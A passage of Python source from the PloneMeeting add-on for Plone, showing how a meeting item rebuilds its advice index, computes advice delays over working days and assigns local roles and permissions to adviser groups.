computeNewDelayInfos or 'delay_infos' not in self.adviceIndex[groupId]:\n delay_infos = self.getDelayInfosForAdvice(groupId)\n else:\n delay_infos = self.adviceIndex[groupId]['delay_infos']\n return delay_infos['delay_status'] == 'timed_out' or \\\n delay_infos['delay_status_when_stopped'] == 'stopped_timed_out'\n\n def _is_currently_updating_advices(self):\n \"\"\" \"\"\"\n return self.REQUEST.get('currentlyUpdatingAdvice', False)\n\n def _updateAdvices(self,\n cfg,\n item_state,\n invalidate=False,\n triggered_by_transition=None,\n inheritedAdviserUids=[]):\n '''Every time an item is created or updated, this method updates the\n dictionary self.adviceIndex: a key is added for every advice that needs\n to be given, a key is removed for every advice that does not need to\n be given anymore. If p_invalidate = True, it means that advice\n invalidation is enabled and someone has modified the item: it means\n that all advices will be NOT_GIVEN_ADVICE_VALUE again.\n If p_triggered_by_transition is given, we know that the advices are\n updated because of a workflow transition, we receive the transition name.\n WARNING : this method is a sub-method of self.update_local_roles and is not supposed\n to be called separately unless you know what you are doing! Indeed, as this method involves\n localRoles management, various methods update localRoles sometimes same localRoles.'''\n # bypass advice update if we are pasting items containing advices\n if self.REQUEST.get('currentlyPastingItems', False):\n return\n\n # declare that we are currently updating advices\n # because some subprocess like events could call it again\n # leading to some inconsistency...\n self.REQUEST.set('currentlyUpdatingAdvice', True)\n\n old_adviceIndex = deepcopy(self.adviceIndex.data)\n\n isDefinedInTool = self.isDefinedInTool()\n if isDefinedInTool:\n self.adviceIndex = PersistentMapping()\n plone_utils = api.portal.get_tool('plone_utils')\n\n # check if the given p_triggered_by_transition transition name\n # is the transition that will restart delays\n isTransitionReinitializingDelays = triggered_by_transition in \\\n cfg.getTransitionsReinitializingDelays()\n\n # add a message for the user\n if isTransitionReinitializingDelays:\n plone_utils.addPortalMessage(\n translate('advices_delays_reinitialized',\n domain=\"PloneMeeting\",\n context=self.REQUEST),\n type='info')\n\n # Invalidate advices if needed\n if invalidate:\n # Invalidate all advices. Send notification mail(s) if configured.\n for org_uid, adviceInfo in self.adviceIndex.iteritems():\n advice_obj = self.getAdviceObj(adviceInfo['id'])\n if advice_obj:\n # Send a mail to the group that can give the advice.\n if 'adviceInvalidated' in cfg.getMailItemEvents():\n plone_group_id = get_plone_group_id(org_uid, 'advisers')\n sendMailIfRelevant(self,\n 'adviceInvalidated',\n [plone_group_id],\n isGroupIds=True)\n plone_utils.addPortalMessage(translate('advices_invalidated',\n domain=\"PloneMeeting\",\n context=self.REQUEST),\n type='info')\n # remove every meetingadvice from self\n self._removeEveryContainedAdvices(suppress_events=False)\n\n # manage inherited advices\n inheritedAdviserUids = inheritedAdviserUids or [\n org_uid for org_uid in self.adviceIndex\n if self.adviceIndex[org_uid].get('inherited', False)]\n\n # Update the dictionary self.adviceIndex with every advices to give\n i = -1\n # we will recompute the entire adviceIndex\n # just save some data that are only in the adviceIndex :\n # 'delay_started_on'\n # 'delay_stopped_on'\n # 'delay_for_automatic_adviser_changed_manually'\n saved_stored_data = {}\n adapted = self.adapted()\n for org_uid, adviceInfo in self.adviceIndex.iteritems():\n saved_stored_data[org_uid] = {}\n reinit_delay = adapted._adviceDelayWillBeReinitialized(\n org_uid, adviceInfo, isTransitionReinitializingDelays)\n if reinit_delay or org_uid in inheritedAdviserUids:\n saved_stored_data[org_uid]['delay_started_on'] = None\n saved_stored_data[org_uid]['delay_stopped_on'] = None\n else:\n saved_stored_data[org_uid]['delay_started_on'] = 'delay_started_on' in adviceInfo and \\\n adviceInfo['delay_started_on'] or None\n saved_stored_data[org_uid]['delay_stopped_on'] = 'delay_stopped_on' in adviceInfo and \\\n adviceInfo['delay_stopped_on'] or None\n saved_stored_data[org_uid]['delay_for_automatic_adviser_changed_manually'] = \\\n 'delay_for_automatic_adviser_changed_manually' in adviceInfo and \\\n adviceInfo['delay_for_automatic_adviser_changed_manually'] or False\n saved_stored_data[org_uid]['delay_changes_history'] = \\\n 'delay_changes_history' in adviceInfo and \\\n adviceInfo['delay_changes_history'] or []\n saved_stored_data[org_uid]['proposing_group_comment'] = \\\n adviceInfo.get('proposing_group_comment', u'')\n saved_stored_data[org_uid]['inherited'] = \\\n 'inherited' in adviceInfo and \\\n adviceInfo['inherited'] or bool(org_uid in inheritedAdviserUids)\n if 'isConfidential' in adviceInfo:\n saved_stored_data[org_uid]['isConfidential'] = adviceInfo['isConfidential']\n else:\n saved_stored_data[org_uid]['isConfidential'] = cfg.getAdviceConfidentialityDefault()\n\n # Compute automatic\n # no sense to compute automatic advice on items defined in the configuration\n if isDefinedInTool:\n automaticAdvisers = []\n else:\n # here, there are still no 'Reader' access for advisers to the item\n # make sure the automatic advisers (where a TAL expression is evaluated)\n # may access the item correctly\n with api.env.adopt_roles(['Manager', ]):\n automaticAdvisers = self.getAutomaticAdvisersData()\n # get formatted optionalAdvisers to be coherent with automaticAdvisers data format\n optionalAdvisers = self.getOptionalAdvisersData()\n # now get inherited advices that are not in optional advisers and\n # automatic advisers, it is the case for not_asked advices or when sending\n # an item to another MC\n handledAdviserUids = [optAdviser['org_uid'] for optAdviser in optionalAdvisers\n if optAdviser['org_uid'] not in inheritedAdviserUids]\n handledAdviserUids += [autoAdviser['org_uid'] for autoAdviser in automaticAdvisers\n if autoAdviser['org_uid'] not in inheritedAdviserUids]\n # when inheritedAdviserUids, adviceIndex is empty\n unhandledAdviserUids = [org_uid for org_uid in inheritedAdviserUids\n if org_uid not in handledAdviserUids]\n # if we have an adviceIndex, check that every inherited adviserIds are handled\n unhandledAdviserUids += [\n org_uid for org_uid in self.adviceIndex\n if self.adviceIndex[org_uid].get('inherited', False) and\n org_uid not in handledAdviserUids]\n if unhandledAdviserUids:\n optionalAdvisers += self.getUnhandledInheritedAdvisersData(\n unhandledAdviserUids, optional=True)\n automaticAdvisers += self.getUnhandledInheritedAdvisersData(\n unhandledAdviserUids, optional=False)\n # we keep the optional and automatic advisers separated because we need\n # to know what advices are optional or not\n # if an advice is in both optional and automatic advisers, the automatic is kept\n self.adviceIndex = PersistentMapping()\n for adviceType in (optionalAdvisers, automaticAdvisers):\n i += 1\n optional = (i == 0)\n for adviceInfo in adviceType:\n # We create an empty dictionary that will store advice info\n # once the advice will have been created. But for now, we already\n # store known infos coming from the configuration and from selected otpional advisers\n org_uid = adviceInfo['org_uid']\n self.adviceIndex[org_uid] = d = PersistentMapping()\n d['type'] = NOT_GIVEN_ADVICE_VALUE\n d['optional'] = optional\n d['not_asked'] = False\n d['id'] = org_uid\n d['name'] = get_organization(org_uid).get_full_title()\n d['comment'] = None\n d['delay'] = adviceInfo['delay']\n d['delay_left_alert'] = adviceInfo['delay_left_alert']\n d['delay_label'] = adviceInfo['delay_label']\n d['gives_auto_advice_on_help_message'] = \\\n adviceInfo['gives_auto_advice_on_help_message']\n d['row_id'] = adviceInfo['row_id']\n d['hidden_during_redaction'] = False\n # manage the 'delay_started_on' data that was saved prior\n if adviceInfo['delay'] and \\\n org_uid in saved_stored_data and \\\n adapted._adviceDelayMayBeStarted(org_uid):\n d['delay_started_on'] = saved_stored_data[org_uid]['delay_started_on']\n else:\n d['delay_started_on'] = None\n # manage stopped delay\n if org_uid in saved_stored_data:\n d['delay_stopped_on'] = saved_stored_data[org_uid]['delay_stopped_on']\n else:\n d['delay_stopped_on'] = None\n # advice_given_on will be filled by already given advices\n d['advice_given_on'] = None\n d['advice_given_on_localized'] = None\n # save the fact that a delay for an automatically asked advice\n # was changed manually. Indeed, we need to know it because at next advice update,\n # the normally auto asked advice must not interfer this manually managed advice.\n # This is the case if some delay-aware auto advice are linked together using the\n # 'is_linked_to_previous_row' on the MeetingConfig.customAdvisers\n if org_uid in saved_stored_data:\n d['delay_for_automatic_adviser_changed_manually'] = \\\n saved_stored_data[org_uid]['delay_for_automatic_adviser_changed_manually']\n d['delay_changes_history'] = saved_stored_data[org_uid]['delay_changes_history']\n d['isConfidential'] = saved_stored_data[org_uid]['isConfidential']\n d['inherited'] = saved_stored_data[org_uid]['inherited']\n d['proposing_group_comment'] = \\\n saved_stored_data[org_uid]['proposing_group_comment']\n else:\n d['delay_for_automatic_adviser_changed_manually'] = False\n d['delay_changes_history'] = []\n d['isConfidential'] = cfg.getAdviceConfidentialityDefault()\n d['inherited'] = bool(org_uid in inheritedAdviserUids)\n d['proposing_group_comment'] = u''\n # index view/add/edit access\n d['item_viewable_by_advisers'] = False\n d['advice_addable'] = False\n d['advice_editable'] = False\n # userids\n d['userids'] = adviceInfo['userids']\n\n # now update self.adviceIndex with given advices\n for org_uid, adviceInfo in self.getGivenAdvices().iteritems():\n # first check that groupId is in self.adviceIndex, there could be 2 cases :\n # - in case an advice was asked automatically and condition that was True at the time\n # is not True anymore (item/getBudgetRelated for example) but the advice was given in between\n # However, in this case we have a 'row_id' stored in the given advice\n # - in case we have a not asked advice given by a PowerAdviser, in this case, we have no 'row_id'\n if org_uid not in self.adviceIndex:\n self.adviceIndex[org_uid] = PersistentMapping()\n if not adviceInfo['row_id']:\n # this is a given advice that was not asked (given by a PowerAdviser)\n adviceInfo['not_asked'] = True\n if adviceInfo['delay'] and \\\n org_uid in saved_stored_data and \\\n adapted._adviceDelayMayBeStarted(org_uid):\n # an automatic advice was given but because something changed on the item\n # for example switched from budgetRelated to not budgetRelated, the automatic\n # advice should not be asked, but as already given, we keep it\n adviceInfo['delay_started_on'] = saved_stored_data[org_uid]['delay_started_on']\n if org_uid in saved_stored_data:\n adviceInfo['delay_stopped_on'] = saved_stored_data[org_uid]['delay_stopped_on']\n adviceInfo['delay_for_automatic_adviser_changed_manually'] = \\\n saved_stored_data[org_uid]['delay_for_automatic_adviser_changed_manually']\n adviceInfo['delay_changes_history'] = saved_stored_data[org_uid]['delay_changes_history']\n adviceInfo['isConfidential'] = saved_stored_data[org_uid]['isConfidential']\n adviceInfo['proposing_group_comment'] = \\\n saved_stored_data[org_uid]['proposing_group_comment']\n else:\n adviceInfo['delay_for_automatic_adviser_changed_manually'] = False\n adviceInfo['delay_changes_history'] = []\n adviceInfo['isConfidential'] = cfg.getAdviceConfidentialityDefault()\n adviceInfo['proposing_group_comment'] = u''\n # index view/add/edit access\n adviceInfo['item_viewable_by_advisers'] = False\n adviceInfo['advice_addable'] = False\n adviceInfo['advice_editable'] = False\n adviceInfo['inherited'] = False\n adviceInfo['userids'] = []\n self.adviceIndex[org_uid].update(adviceInfo)\n\n # and remove specific permissions given to add advices\n # make sure the 'PloneMeeting: Add advice' permission is not\n # given to the 'MeetingAdviser' role\n self._removePermissionToRole(permission=AddAdvice,\n role_to_remove='MeetingAdviser',\n obj=self)\n # manage PowerAdvisers\n # we will give those groups the ability to give an advice on this item\n # even if the advice was not asked...\n for org_uid in cfg.getPowerAdvisersGroups():\n # if group already gave advice, we continue\n if org_uid in self.adviceIndex:\n continue\n # we even consider orgs having their _advisers Plone group\n # empty because this does not change anything in the UI and adding a\n # user after in the _advisers suffixed Plone group will do things work as expected\n if item_state in cfg.getItemAdviceStatesForOrg(org_uid):\n plone_group_id = get_plone_group_id(org_uid, suffix='advisers')\n # power advisers get only the right to add the advice, but not to see the item\n # this must be provided using another functionnality, like power observers or so\n self.manage_addLocalRoles(plone_group_id, ('MeetingAdviser', ))\n # make sure 'MeetingAdviser' has the 'AddAdvice' permission\n self._grantPermissionToRole(permission=AddAdvice,\n role_to_give='MeetingAdviser',\n obj=self)\n\n # Then, add local roles regarding asked advices\n wfTool = api.portal.get_tool('portal_workflow')\n for org_uid in self.adviceIndex.iterkeys():\n org = get_organization(org_uid)\n itemAdviceStates = org.get_item_advice_states(cfg)\n itemAdviceEditStates = org.get_item_advice_edit_states(cfg)\n itemAdviceViewStates = org.get_item_advice_view_states(cfg)\n plone_group_id = get_plone_group_id(org_uid, 'advisers')\n adviceObj = None\n if 'advice_id' in self.adviceIndex[org_uid]:\n adviceObj = getattr(self, self.adviceIndex[org_uid]['advice_id'])\n giveReaderAccess = True\n if item_state not in itemAdviceStates and \\\n item_state not in itemAdviceEditStates and \\\n item_state not in itemAdviceViewStates:\n giveReaderAccess = False\n # in this case, the advice is no more accessible in any way by the adviser\n # make sure the advice given by groupId is no more editable\n if adviceObj and not adviceObj.query_state() == 'advice_given':\n self.REQUEST.set('mayGiveAdvice', True)\n # add a comment for this transition triggered by the application,\n # we want to show why it was triggered : item state change or delay exceeded\n wf_comment = _('wf_transition_triggered_by_application')\n wfTool.doActionFor(adviceObj, 'giveAdvice', comment=wf_comment)\n self.REQUEST.set('mayGiveAdvice', False)\n # in case advice was not given or access to given advice is not kept,\n # we are done with this one\n # just check the keep_access_to_item_when_advice\n # when 'was_giveable' if item was in a state where advices were giveable\n # access is kept, when 'is_given', access is kept if advice given\n keep_access_to_item_when_advice = org.get_keep_access_to_item_when_advice(cfg)\n if (adviceObj and keep_access_to_item_when_advice == 'is_given') or \\\n (keep_access_to_item_when_advice == 'was_giveable' and\n set(itemAdviceStates).intersection(\n get_all_history_attr(self, attr_name='review_state'))):\n giveReaderAccess = True\n\n if adapted._itemToAdviceIsViewable(org_uid) and giveReaderAccess:\n # give access to the item if adviser can see it\n self.manage_addLocalRoles(plone_group_id, (READER_USECASES['advices'],))\n self.adviceIndex[org_uid]['item_viewable_by_advisers'] = True\n\n # manage delay, add/edit access only if advice is not inherited\n if not self.adviceIsInherited(org_uid):\n # manage delay-aware advice, we start the delay if not already started\n if item_state in itemAdviceStates and \\\n self.adviceIndex[org_uid]['delay'] and not \\\n self.adviceIndex[org_uid]['delay_started_on'] and \\\n adapted._adviceDelayMayBeStarted(org_uid):\n self.adviceIndex[org_uid]['delay_started_on'] = datetime.now()\n\n # check if user must be able to add an advice, if not already given\n # check also if the delay is not exceeded,\n # in this case the advice can not be given anymore\n delayIsNotExceeded = not self._adviceDelayIsTimedOut(\n org_uid, computeNewDelayInfos=True)\n if item_state in itemAdviceStates and \\\n not adviceObj and \\\n delayIsNotExceeded and \\\n adapted._adviceIsAddable(org_uid):\n # advisers must be able to add a 'meetingadvice', give\n # relevant permissions to 'MeetingAdviser' role\n # the 'Add portal content' permission is given by default to 'MeetingAdviser',\n # so we need to give 'PloneMeeting: Add advice' permission too\n self.manage_addLocalRoles(plone_group_id, ('MeetingAdviser', ))\n self._grantPermissionToRole(permission=AddAdvice,\n role_to_give='MeetingAdviser',\n obj=self)\n self.adviceIndex[org_uid]['advice_addable'] = True\n\n # is advice still editable?\n if item_state in itemAdviceEditStates and \\\n delayIsNotExceeded and \\\n adviceObj and \\\n adapted._adviceIsEditable(org_uid):\n # make sure the advice given by groupId is no more in state 'advice_given'\n # if it is the case, we set it back to the advice initial_state\n if adviceObj.query_state() == 'advice_given':\n try:\n # make the guard_expr protecting 'mayBackToAdviceInitialState' alright\n self.REQUEST.set('mayBackToAdviceInitialState', True)\n # add a comment for this transition triggered by the application\n wf_comment = _('wf_transition_triggered_by_application')\n wfTool.doActionFor(adviceObj, 'backToAdviceInitialState', comment=wf_comment)\n except WorkflowException:\n # if we have another workflow than default meetingadvice_workflow\n # maybe we can not 'backToAdviceInitialState'\n pass\n self.REQUEST.set('mayBackToAdviceInitialState', False)\n self.adviceIndex[org_uid]['advice_editable'] = True\n else:\n # make sure it is no more editable\n if adviceObj and not adviceObj.query_state() == 'advice_given':\n self.REQUEST.set('mayGiveAdvice', True)\n # add a comment for this transition triggered by the application\n wf_comment = _('wf_transition_triggered_by_application')\n wfTool.doActionFor(adviceObj, 'giveAdvice', comment=wf_comment)\n self.REQUEST.set('mayGiveAdvice', False)\n # if item needs to be accessible by advisers, it is already\n # done by self.manage_addLocalRoles here above because it is necessary in any case\n if item_state in itemAdviceViewStates:\n pass\n\n # make sure there is no 'delay_stopped_on' date if advice still giveable\n if item_state in itemAdviceStates:\n self.adviceIndex[org_uid]['delay_stopped_on'] = None\n # the delay is stopped for advices\n # when the advice can not be given anymore due to a workflow transition\n # we only do that if not already done (a stopped date is already defined)\n # and if we are not on the transition that reinitialize delays\n # and if ever delay was started\n if item_state not in itemAdviceStates and \\\n self.adviceIndex[org_uid]['delay'] and \\\n self.adviceIndex[org_uid]['delay_started_on'] and \\\n not isTransitionReinitializingDelays and \\\n not bool(org_uid in saved_stored_data and\n saved_stored_data[org_uid]['delay_stopped_on']):\n self.adviceIndex[org_uid]['delay_stopped_on'] = datetime.now()\n\n # compute and store delay_infos\n if self.adviceIsInherited(org_uid):\n # if we are removing the predecessor, advice is inherited but\n # the predecessor is not available anymore, double check\n inheritedAdviceInfos = self.getInheritedAdviceInfo(org_uid)\n adviceHolder = inheritedAdviceInfos and inheritedAdviceInfos['adviceHolder'] or self\n else:\n adviceHolder = self\n self.adviceIndex[org_uid]['delay_infos'] = adviceHolder.getDelayInfosForAdvice(org_uid)\n # send delay expiration warning notification if relevant\n self.sendAdviceDelayWarningMailIfRelevant(\n org_uid, old_adviceIndex)\n # update advice review_state\n if adviceObj is not None:\n self.adviceIndex[org_uid]['advice_review_state'] = adviceObj.query_state()\n else:\n self.adviceIndex[org_uid]['advice_review_state'] = None\n\n # update adviceIndex of every items for which I am the predecessor\n # this way inherited advices are correct if any\n successors = self.get_every_successors()\n for successor in successors:\n # removed inherited advice uids are advice removed on original item\n # that were inherited on back references\n removedInheritedAdviserUids = [\n adviceInfo['id'] for adviceInfo in successor.adviceIndex.values()\n if adviceInfo.get('inherited', False) and\n adviceInfo['id'] not in self.adviceIndex]\n if removedInheritedAdviserUids:\n for removedInheritedAdviserUid in removedInheritedAdviserUids:\n successor.adviceIndex[removedInheritedAdviserUid]['inherited'] = False\n successor.update_local_roles()\n\n # notify that advices have been updated so subproducts\n # may interact if necessary\n notify(AdvicesUpdatedEvent(self,\n triggered_by_transition=triggered_by_transition,\n old_adviceIndex=old_adviceIndex))\n self.REQUEST.set('currentlyUpdatingAdvice', False)\n indexes = []\n try:\n if self.adviceIndex != old_adviceIndex:\n indexes += adapted.getAdviceRelatedIndexes()\n except UnicodeDecodeError:\n indexes += adapted.getAdviceRelatedIndexes()\n return indexes\n\n def _itemToAdviceIsViewable(self, org_uid):\n '''See doc in interfaces.py.'''\n return True\n\n def _adviceIsAddable(self, org_uid):\n '''See doc in interfaces.py.'''\n return True\n\n def _adviceIsAddableByCurrentUser(self, org_uid):\n '''See doc in interfaces.py.'''\n return True\n\n def _adviceIsEditable(self, org_uid):\n '''See doc in interfaces.py.'''\n return True\n\n def _adviceIsEditableByCurrentUser(self, org_uid):\n '''See doc in interfaces.py.'''\n item = self.getSelf()\n adviceObj = item.getAdviceObj(org_uid)\n return _checkPermission(ModifyPortalContent, adviceObj)\n\n def _adviceDelayMayBeStarted(self, org_uid):\n '''See doc in interfaces.py.'''\n return True\n\n def _adviceDelayWillBeReinitialized(self,\n org_uid,\n adviceInfo,\n isTransitionReinitializingDelays):\n '''See doc in interfaces.py.'''\n item = self.getSelf()\n reinit_delay = False\n if isTransitionReinitializingDelays and not item._advice_is_given(org_uid):\n reinit_delay = True\n return reinit_delay\n\n security.declarePublic('getDelayInfosForAdvice')\n\n def getDelayInfosForAdvice(self, advice_id):\n '''Compute left delay in number of days for given p_advice_id.\n Returns real left delay, a status information aka :\n - not yet giveable;\n - still in delays;\n - delays timeout.\n Returns also the real limit date and the initial delay.\n This call is only relevant for a delay-aware advice.'''\n toLocalizedTime = self.restrictedTraverse('@@plone').toLocalizedTime\n data = {'left_delay': None,\n 'delay_status': None,\n 'limit_date': None,\n 'limit_date_localized': None,\n 'delay': None,\n 'delay_started_on_localized': None,\n 'delay_stopped_on_localized': None,\n 'delay_when_stopped': None,\n 'delay_status_when_stopped': None}\n delay_started_on = delay_stopped_on = None\n adviceInfos = self.adviceIndex[advice_id]\n # if it is not a delay-aware advice, return\n if not adviceInfos['delay']:\n return {}\n\n delay = int(adviceInfos['delay'])\n data['delay'] = delay\n if adviceInfos['delay_started_on']:\n data['delay_started_on_localized'] = toLocalizedTime(adviceInfos['delay_started_on'])\n delay_started_on = self._doClearDayFrom(adviceInfos['delay_started_on'])\n\n if adviceInfos['delay_stopped_on']:\n data['delay_stopped_on_localized'] = toLocalizedTime(adviceInfos['delay_stopped_on'])\n delay_stopped_on = self._doClearDayFrom(adviceInfos['delay_stopped_on'])\n\n # if delay still not started, we return complete delay\n # except special case where we asked an advice when\n # advice are not giveable anymore\n if not delay_started_on:\n if not delay_stopped_on:\n data['left_delay'] = delay\n data['delay_status'] = 'not_yet_giveable'\n return data\n else:\n # here finally the delay is stopped\n # but it never started for current advice\n data['left_delay'] = delay\n data['delay_status'] = 'never_giveable'\n return data\n\n tool = api.portal.get_tool('portal_plonemeeting')\n holidays = tool.getHolidaysAs_datetime()\n weekends = tool.getNonWorkingDayNumbers()\n unavailable_weekdays = tool.getUnavailableWeekDaysNumbers()\n limit_date = workday(delay_started_on,\n delay,\n holidays=holidays,\n weekends=weekends,\n unavailable_weekdays=unavailable_weekdays)\n data['limit_date'] = limit_date\n data['limit_date_localized'] = toLocalizedTime(limit_date)\n\n # if delay is stopped, it means that we can no more give the advice\n if delay_stopped_on:\n data['left_delay'] = delay\n # compute how many days left/exceeded when the delay was stopped\n # find number of days between delay_started_on and delay_stopped_on\n delay_when_stopped = networkdays(adviceInfos['delay_stopped_on'],\n limit_date,\n holidays=holidays,\n weekends=weekends)\n data['delay_when_stopped'] = delay_when_stopped\n if data['delay_when_stopped'] > 0:\n data['delay_status_when_stopped'] = 'stopped_still_time'\n else:\n data['delay_status_when_stopped'] = 'stopped_timed_out'\n\n data['delay_status'] = 'no_more_giveable'\n return data\n\n # compute left delay taking holidays, and unavailable weekday into account\n left_delay = networkdays(datetime.now(),\n limit_date,\n holidays=holidays,\n weekends=weekends)\n data['left_delay'] = left_delay\n\n if left_delay >= 0:\n # delay status is either 'we have time' or 'please hurry up' depending\n # on value defined in 'delay_left_alert'\n if not adviceInfos['delay_left_alert'] or int(adviceInfos['delay_left_alert']) < left_delay:\n data['delay_status'] = 'still_time'\n else:\n data['delay_status'] = 'still_time_but_alert'\n else:\n data['delay_status'] = 'timed_out'\n\n # advice already given, or left_delay negative left_delay shown is delay\n # so left_delay displayed on the advices popup is not something like '-547'\n # only show left delay if advice in under redaction, aka not really given...\n if not adviceInfos['hidden_during_redaction'] and \\\n (adviceInfos['advice_given_on'] or data['left_delay'] < 0):\n data['left_delay'] = delay\n return data\n\n return data\n\n security.declarePublic('getCopyGroupsHelpMsg')\n\n def getCopyGroupsHelpMsg(self, cfg):\n '''Help message regarding copy groups configuration.'''\n translated_states = translate_list(cfg.getItemCopyGroupsStates())\n msg = translate(msgid=\"copy_groups_help_msg\",\n domain=\"PloneMeeting\",\n mapping={\"states\": translated_states},\n context=self.REQUEST)\n return msg\n\n security.declarePublic('getAdviceHelpMessageFor')\n\n def getAdviceHelpMessageFor(self, **adviceInfos):\n '''Build a specific help message for the given advice_id. We will compute\n a message based on the fact that the advice is optional or not and that there\n are defined 'Help message' in the MeetingConfig.customAdvisers configuration (for performance,\n the 'Help message' infos from the configuration are stored in the adviceIndex).'''\n # base help message is based on the fact that advice is optional or not\n help_msg = ''\n if adviceInfos['optional']:\n # the advice was not asked but given by a super adviser\n if adviceInfos['not_asked']:\n help_msg = translate('This optional advice was given of initiative by a power adviser',\n domain=\"PloneMeeting\",\n context=self.REQUEST)\n else:\n help_msg = translate('This optional advice was asked by the item creators',\n domain=\"PloneMeeting\",\n context=self.REQUEST)\n else:\n help_msg = translate('This automatic advice has been asked by the application',\n domain=\"PloneMeeting\",\n context=self.REQUEST)\n # an additional help message can be provided for automatically asked advices\n help_msg = \"%s \\n%s: %s\" % (help_msg,\n translate('Advice asked automatically because',\n domain=\"PloneMeeting\",\n context=self.REQUEST),\n unicode(adviceInfos['gives_auto_advice_on_help_message'], 'utf-8') or '-')\n # if it is a delay-aware advice, display the number of days to give the advice\n # like that, when the limit decrease (3 days left), we still have the info\n # about original number of days to give advice\n if adviceInfos['delay']:\n help_msg += \"\\n%s\" % translate('Days to give advice',\n domain=\"PloneMeeting\",\n mapping={'daysToGiveAdvice': adviceInfos['delay']},\n context=self.REQUEST)\n # advice review_states related informations (addable, editable/removeable, viewable)\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n item_advice_states = cfg.getItemAdviceStatesForOrg(adviceInfos['id'])\n translated_item_advice_states = translate_list(item_advice_states)\n advice_states_msg = translate(\n 'This advice is addable in following states : ${item_advice_states}.',\n mapping={'item_advice_states': translated_item_advice_states},\n domain=\"PloneMeeting\",\n context=self.REQUEST)\n return help_msg + '\\n' + advice_states_msg\n\n security.declarePrivate('at_post_create_script')\n\n def at_post_create_script(self, **kwargs):\n # The following field allows to store events that occurred in the life\n # of an item, like annex deletions or additions.\n self.itemHistory = PersistentList()\n # Add a place to store automatically added copyGroups\n self.autoCopyGroups = PersistentList()\n # Remove temp local role that allowed to create the item in\n # portal_factory.\n userId = get_current_user_id(self.REQUEST)\n self.manage_delLocalRoles([userId])\n self.manage_addLocalRoles(userId, ('Owner',))\n # update groupsInCharge before update_local_roles\n self.update_groups_in_charge()\n indexes = self.update_local_roles(\n isCreated=True,\n inheritedAdviserUids=kwargs.get('inheritedAdviserUids', []))\n # clean borg.localroles caching\n cleanMemoize(self, prefixes=['borg.localrole.workspace.checkLocalRolesAllowed'])\n # Apply potential transformations to richtext fields\n transformAllRichTextFields(self)\n # Make sure we have 'text/html' for every Rich fields\n forceHTMLContentTypeForEmptyRichFields(self)\n # update committees if necessary\n indexes += self.update_committees()\n # reindex necessary indexes\n self.reindexObject(idxs=indexes)\n # itemReference uses MeetingConfig.computeItemReferenceForItemsOutOfMeeting?\n self.update_item_reference()\n # Call sub-product-specific behaviour\n self.adapted().onEdit(isCreated=True)\n\n def _update_after_edit(self, idxs=['*'], reindex_local_roles=True):\n \"\"\"Convenience method that make sure ObjectModifiedEvent and\n at_post_edit_script are called, like it is the case in\n Archetypes.BaseObject.processForm.\n We also call reindexObject here so we avoid multiple reindexation\n as it is already done in processForm.\n This is called when we change something on an item and we do not\n use processForm.\"\"\"\n # WARNING, we do things the same order processForm do it\n # reindexObject is done in _processForm, then notify and\n # call to at_post_edit_script are done\n # moreover, warn when called with idxs=['*']\n if idxs == ['*']:\n logger.warn(\"MeetingItem._update_after_edit was called with \"\n \"idxs=['*'], make sure this is correct!\")\n notifyModifiedAndReindex(self, extra_idxs=idxs, notify_event=True)\n self.at_post_edit_script(\n full_edit_form=False, reindex_local_roles=reindex_local_roles)\n\n security.declarePrivate('at_post_edit_script')\n\n def at_post_edit_script(self, full_edit_form=True, reindex_local_roles=False):\n # update groupsInCharge before update_local_roles\n self.update_groups_in_charge()\n indexes = self.update_local_roles(\n invalidate=self.willInvalidateAdvices(),\n isCreated=False,\n avoid_reindex=True)\n if full_edit_form:\n # Apply potential transformations to richtext fields\n transformAllRichTextFields(self)\n # Add a line in history if historized fields have changed\n addDataChange(self)\n # Make sure we have 'text/html' for every Rich fields\n forceHTMLContentTypeForEmptyRichFields(self)\n # update committees if necessary\n indexes += self.update_committees()\n if reindex_local_roles or full_edit_form:\n self.reindexObject(idxs=indexes)\n # Call sub-product-specific behaviour\n self.adapted().onEdit(isCreated=False)\n\n security.declarePublic('updateHistory')\n\n def updateHistory(self, action, subObj, **kwargs):\n '''Adds an event to the item history. p_action may be 'add' or 'delete'.\n p_subObj is the sub-object created or deleted (ie an annex). p_kwargs\n are additional entries that will be stored in the event within item's\n history.'''\n # Update history only if the item is in some states\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n if self.query_state() in cfg.getRecordItemHistoryStates():\n # Create the event\n user_id = get_current_user_id(self.REQUEST)\n event = {'action': action, 'type': subObj.meta_type,\n 'title': subObj.Title(), 'time': DateTime(),\n 'actor': user_id}\n event.update(kwargs)\n # Add the event to item's history\n self.itemHistory.append(event)\n\n def _getGroupManagingItem(self, review_state, theObject=False):\n '''See doc in interfaces.py.'''\n item = self.getSelf()\n return item.getProposingGroup(theObject=theObject)\n\n def _getAllGroupsManagingItem(self, review_state, theObjects=False):\n '''See doc in interfaces.py.'''\n res = []\n item = self.getSelf()\n proposingGroup = item.getProposingGroup(theObject=theObjects)\n if proposingGroup:\n res.append(proposingGroup)\n return res\n\n def _assign_roles_to_group_suffixes(self, org_uid, suffix_roles):\n \"\"\"Helper that applies local_roles for org_uid to p_sufix_roles.\n p_suffixes_roles is like:\n {'observers': ['Reader'], 'creators': ['Reader']}\n \"\"\"\n # apply local roles to computed suffixes\n for suffix, roles in suffix_roles.items():\n # suffix_roles keep only existing suffixes\n plone_group_id = get_plone_group_id(org_uid, suffix)\n if not isinstance(roles, (list, tuple)):\n raise Exception(\n \"Parameter suffix_roles values must be of type tuple or list!\")\n self.manage_addLocalRoles(plone_group_id, tuple(roles))\n\n def _assign_roles_to_all_groups_managing_item_suffixes(self,\n cfg,\n item_state,\n org_uids,\n org_uid):\n '''See doc in interfaces.py.'''\n # by default, every suffixes receive Reader role\n item = self.getSelf()\n for managing_org_uid in org_uids:\n suffix_roles = {suffix: ['Reader'] for suffix in\n get_all_suffixes(managing_org_uid)}\n item._assign_roles_to_group_suffixes(managing_org_uid, suffix_roles)\n\n def assign_roles_to_group_suffixes(self, cfg, item_state):\n \"\"\"Method that do the work of assigning relevant roles to\n suffixed groups of an organization depending on current state :\n - suffix '_observers' will have 'Reader' role in every cases;\n - state 'itemcreated', _creators is 'Editor';\n - states managed by MeetingConfig.itemWFValidationLevels.\n For now, we manage every roles :\n - itemcreated;\n - validation levels\n For unknown states, method _get_corresponding_state_to_assign_local_roles\n will be used to determinate a known configuration to take into ccount\"\"\"\n adapted = self.adapted()\n # Add the local roles corresponding to the group managing the item\n org_uid = adapted._getGroupManagingItem(item_state, theObject=False)\n # in some case like ItemTemplate, we have no proposing group\n if not org_uid:\n return\n 